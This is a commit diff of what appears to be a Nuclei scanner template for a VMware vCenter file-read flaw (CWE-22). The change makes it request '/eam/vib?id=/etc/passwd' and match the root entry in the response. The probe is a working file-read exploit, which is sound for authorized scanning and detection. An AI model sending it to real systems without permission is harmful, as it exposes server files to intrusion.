commit
2f6ceda18f
|
@ -9,15 +9,14 @@ info:
|
||||||
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
|
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
|
||||||
cvss-score: 7.5
|
cvss-score: 7.5
|
||||||
cwe-id: CWE-22
|
cwe-id: CWE-22
|
||||||
tags: vmware,lfi,vcenter
|
tags: vmware,lfi,vcenter,linux
|
||||||
|
|
||||||
requests:
|
requests:
|
||||||
- method: GET
|
- method: GET
|
||||||
path:
|
path:
|
||||||
- "{{BaseURL}}/eam/vib?id=/etc/issue"
|
- "{{BaseURL}}/eam/vib?id=/etc/passwd"
|
||||||
matchers:
|
|
||||||
- type: word
|
|
||||||
words:
|
|
||||||
- "vCenter Server"
|
|
||||||
|
|
||||||
# Enhanced by mp on 2022/08/01
|
matchers:
|
||||||
|
- type: regex
|
||||||
|
regex:
|
||||||
|
- "root:.*:0:0:"
|
||||||
|
|
Loading…
Reference in New Issue